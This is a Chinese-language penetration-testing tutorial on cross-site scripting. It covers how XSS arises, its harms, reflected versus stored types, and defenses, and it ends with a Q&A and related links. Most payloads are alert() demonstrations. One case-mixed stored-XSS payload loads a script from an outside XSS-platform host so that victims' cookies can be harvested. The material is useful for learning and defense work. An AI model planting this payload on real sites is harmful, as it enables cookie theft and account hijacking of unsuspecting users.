【渗透测试】XSS注入原理
目录
- XSS注入原理
- XSS的危害:
- XSS分类
- XSS平台——漏洞利用
- 总结
- 答疑
XSS注入原理
XSS 攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS) 的缩写混淆,故将跨站脚本攻击缩写为 XSS,XSS 是一种在 web 应用中的计算机安全漏洞,它允许恶意 web 用户将代码植入到 web 网站里面,供给其它用户访问,当用户访问到有恶意代码的网页就会产生 XSS 攻击。
XSS是因为用户输入的内容被浏览器当作了前端代码进行执行。
<script>alert(/XSS/)</script>
<script>console.log(1);</script>
<a href=javascript:alert(1)>
<a href='javascript:alert(1)'>aa</a>
XSS是因为用户输入的内容被浏览器当作了前端代码进行执行。
关键点:我们输入的内容一定要是前端代码。
我们能输入的地方:
①.网站给我们提供的框框(搜索框)
②.网址的参数的值
XSS漏洞原理:我们输入的前端代码如果被网站执行了 ,就说明这个网站存在XSS漏洞。
<font color='#ff6600'>非注册会员不可设</font><script>alert(/cccccccccccc/)</script> # 作用:弹框
前端代码:html、css、【javascript】。
XSS的危害:
1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号
2、控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力
3、盗窃企业重要的具有商业价值的资料
4、非法转账
5、强制发送电子邮件(钓鱼)
6、网站挂马
7、控制受害者机器(肉鸡)向其它网站发起攻击
XSS分类
反射型的XSS:你输入的前端代码只执行了一次的就叫做反射型的XSS。
存储型的XSS:你输入的前端代码被目标网站存进了数据库里面,导致其他用户访问一次执行一次。
XSS平台——漏洞利用
XSS漏洞利用:只需要把【漏洞利用代码】放到存在XSS漏洞的地方就可以了。
无keepsession:半个小时,Cookie失效就失效了。
keepsession:保持Cookie的有效性。
</tExtArEa>'"><sCRiPt sRC=//xss8.cc/OAL5></sCrIpT>
短网址的方式
总结
1.XSS漏洞原理:我们输入的前端代码如果被网站执行了 ,就说明这个网站存在XSS漏洞。
2.XSS分类:反射型的XSS、【存储型的XSS】
3.XSS漏洞利用:只需要把【漏洞利用代码】放到存在XSS漏洞的地方就可以了。
答疑
1.&是什么?
keyword=你懂得&enc=utf-8&wq=XSS&pvid=50ff619dd1314c188a33df5ded7b6842
& 相当于 “和”/ and
2.里面的斜杠是双单引号?
语法格式
3.没有授权咋实战?
只能打靶
4.为什么第一次不行,这次好了。问题出在哪里?
复制的时候出了问题。
beef就是一个利用XSS漏洞的工具。
5.可以直接以QQ号主模式登录他QQ空间不?
XSS漏洞还是偏向于社工型。理论上是可以的。
6.那xss怎么去防范呢?
控制输入和输出。
开发人员应该该做的
输入处过滤。
输出处编码。
【渗透测试】XSS注入原理相关推荐
- 如何进行渗透测试XSS跨站攻击检测
国庆假期结束,这一节准备XSS跨站攻击渗透测试中的利用点,上一节讲了SQL注入攻击的详细流程,很多朋友想要咨询具体在跨站攻击上是如何实现和利用的,那么我们Sinesafe渗透测试工程师为大家详细的讲讲 ...
- XSS注入原理以及一些绕过姿势
介绍 XSS--跨站脚本攻击.通过这个攻击手段,攻击者可以将恶意的 JavaScript 代码插入存在 XSS 漏洞的 Web 页面中,当用户浏览带有恶意代码的页面时,这些恶意代码会被触发,从而达到攻 ...
- 渗透测试SQL注入——Sqlilabs关卡详解
目录 报错函数floor的利用 利用select into outfile写一句话木马 利用load_file 读敏感文件 利用sqlmap探测 sql盲注 get基于时间的盲注应用 post基于时间 ...
- (13)web安全|渗透测试|网络安全 注入/跨库查询/文件读写/常见的防护原理 详细图解
目录 高权限注入及低权限注入 跨库查询: 文件读写操作 流程: 找路径: 方法一: 方法二: 方法三: 方法四: 方法五: 方法六: 方法七: 知道路径后,再执行文件的读写操作 文件的写入: 可能遇到 ...
- 渗透测试-XSS漏洞检测
防护绕过 关于XSS漏洞的基础理解,请访问另一篇博文:https://blog.csdn.net/weixin_39190897/article/details/86005088. xss漏洞很容易被 ...
- 渗透测试——sql注入进阶/基于时间的盲注/一看就会/
目录 一.注入点判断 注入类型 SQL注入的类型 二.基于时间的时间盲注 什么是时间盲注 sleep()函数 常用函数 三.bWAPP基于时间的盲注实战 一.注入点判断 1.输入一个单引号',因为语句 ...
- 渗透测试-SQL注入之Fuzz绕过WAF
WAF绕过原理之Fuzz绕过 文章目录 WAF绕过原理之Fuzz绕过 前言 一.什么是Fuzz 二.利用Fuzz绕过WAF获取数据库信息 1.Fuzz绕过方法 2.利用Fuzz绕过WAF获取数据库信息 ...
- 渗透测试-CRLF注入/HTTP响应拆分漏洞(HTTP Response Splitting)
漏洞描述 因为Web应用没有对用户输入做严格验证,导致攻击者可以输入一些恶意字符. 攻击者一旦向请求行或首部中的字段注入恶意的CRLF,就能注入一些首部字段或报文主体, 并在响应中输出,所以又称为 H ...
- 怎样利用超图客户端打点_渗透测试——XSS利用工具BeEF攻击演示
跨站脚本漏洞(Cross-site scripting,通常简称为XSS)发生在客户端,可被用于进行窃取隐私.钓鱼欺骗.窃取密码.传播恶意代码等攻击.XSS攻击使用到的技术主要为HTML和Javasc ...
最新文章
- spark spark streaming + kafka receiver方式消费消息
- C#常用正则表达式总结
- webkit webApp 开发技术要点总结
- PostgreSQL 中的引号与大小写
- iphone如何使用CoreNFC
- python中保留两位小数的编写程序_P081 保留两位小数
- 烂泥:ubuntu中使用virt-manager图形化新建虚拟机
- 如何在Vue中添加百度统计代码?
- python工资这么高为什么不学-为什么Python岗位薪资越来越高
- vuejs+webpack环境搭建
- 我的blog终于开张啦 :)
- python类:class创建、数据方法属性及访问控制(下划线)
- 【u008】瑞瑞的木棍
- Activity中的setDefaultKeyMode() (转载)
- msdtc.exe是微软分布式传输协调程序。该进程调用系统Microsoft Personal Web Server和Microsoft SQL Server。该服务用于管理多个服务
- 如何学习计算机思维,刘康平:为什么我们每个人都应该学习计算思维?
- 儿童“益”站线上课堂 战“疫”不停学
- 更换计算机桌面背景的教案,《设置桌面背景》教学设计范文
- oracle 数值加减乘除
- GCMail反垃圾邮件系统让企业远离垃圾邮件的困饶